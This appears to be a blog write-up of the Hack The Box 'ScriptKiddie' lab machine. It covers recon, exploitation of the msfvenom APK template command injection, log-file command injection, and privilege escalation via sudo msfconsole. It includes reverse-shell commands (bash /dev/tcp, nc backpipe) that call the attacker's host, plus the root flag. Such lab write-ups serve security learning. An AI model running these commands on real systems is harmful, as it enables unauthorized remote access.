ScriptKiddie

Hack The Box Machines No Comments
Recce
$ sudo nmap -p- -T4 -A 10.10.10.226
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-13 13:56 EDT
Nmap scan report for 10.10.10.226
Host is up (0.025s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

$ nikto -h http://10.10.10.226:5000
Server: Werkzeug/0.16.1 Python/3.8.5
The anti-clickjacking X-Frame-Options header is not present.
The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
No CGI Directories found (use '-C all' to force check all possible dirs)
Allowed HTTP Methods: HEAD, POST, OPTIONS, GET
7865 requests: 0 error(s) and 4 item(s) reported on remote host

$ dirb http://10.10.10.226:5000
---- Scanning URL: http://10.10.10.226:5000/ ----
                                                                                                                                                                                  
-----------------
$ searchsploit Werkzeug
Werkzeug - 'Debug Shell' Command Execution              | multiple/remote/43905.py
Werkzeug - Debug Shell Command Execution (Metasploit)   | python/remote/37814.rb

PyWerkzeug-Debug-Command-Execution-master.zip
Werkzeug-Debug-RCE-master.zip

3 tools on the page: Nmap, MsfVenom and Searchsploit.

Vuln:(nudged, not figured out)
Rapid 7 APK Template Command Injection.
CVE-2020-7384: MsfVenom APK template command injection.
https://www.exploit-db.com/exploits/49491

Method:
1. Generate payload; 2. Start the listener; 3. Upload payload

https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/
msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection 
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set TARGET 0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 10.10.14.109
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit
[+] msf.apk stored at /home/kali/.msf4/local/msf.apk
$cp ~/.msf4/local/msf.apk .

htb/machines/ScriptKiddie226$ nc -lvnp 4444                                                                                                                          
listening on [any]

go http://10.10.10.226:5000/ to upload the payload 
Payloads
venom it up - gen rev tcp meterpreter bins
os: android
lhosts: 10.10.14.149
template file: msf.apk
click generate button

back to nc 4444 you will see                                                                                                                                                            
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.226] 60538
python3 -c "import pty; pty.spawn('/bin/bash')"
bash-5.0$ cat user.txt


cat /etc/passwd
kid:x:1000:1000:kid:/home/kid:/bin/bash
pwn:x:1001:1001::/home/pwn:/bin/bash

cat scanlosers.sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

kid@scriptkiddie:~$ cat hacker
test ; ;bash -c 'cat /tmp/backpipe|/bin/bash -i 2>&1|nc 10.10.14.2 9009 >/tmp/backpipe # 
kid@scriptkiddie:~/logs$ ls -l
total 0
-rw-rw-r-- 1 kid pwn 0 May 11 13:37 hackers

flask.service 
│ ├─   897 /usr/bin/python3 /home/kid/html/app.py
│ ├─  2018 /bin/sh
│ ├─  2316 python3 -c import pty; pty.spawn("/bin/sh")
│ ├─  2317 /bin/sh

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.226] 38450
-bash: 1’: ambiguous redirect

/home/kid/logs$ echo “  ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.133/1234 0>&1’ #” >> hackers    #space!
kali@kali:~/0.htb/machines/ScriptKiddie226$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.133] from (UNKNOWN) [10.10.10.226] 45592
bash: cannot set terminal process group (843): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$   
drwx------ 2 pwn  pwn  4096 Feb 10 16:10 .
drwxr-xr-x 6 pwn  pwn  4096 May 11 13:06 ..
-rw-r--r-- 1 root root    0 Feb 10 16:10 authorized_keys


sudo -l
pwn@scriptkiddie:~/.ssh$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~/.ssh$ 

pwn@scriptkiddie:/opt/metasploit-framework-6.0.9$sudo ./msfconsole

Metasploit tip: To save all commands executed since start up to a file, use the makerc command

stty: 'standard input': Inappropriate ioctl for device
msf6 >msf6 > /bin/bash
/bin/bash
[*] exec: /bin/bash

whoami
root
cd /root
ls
root.txt
snap
cat root.txt
53eac4a4e5b67d5b074259151271d6e4


































Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation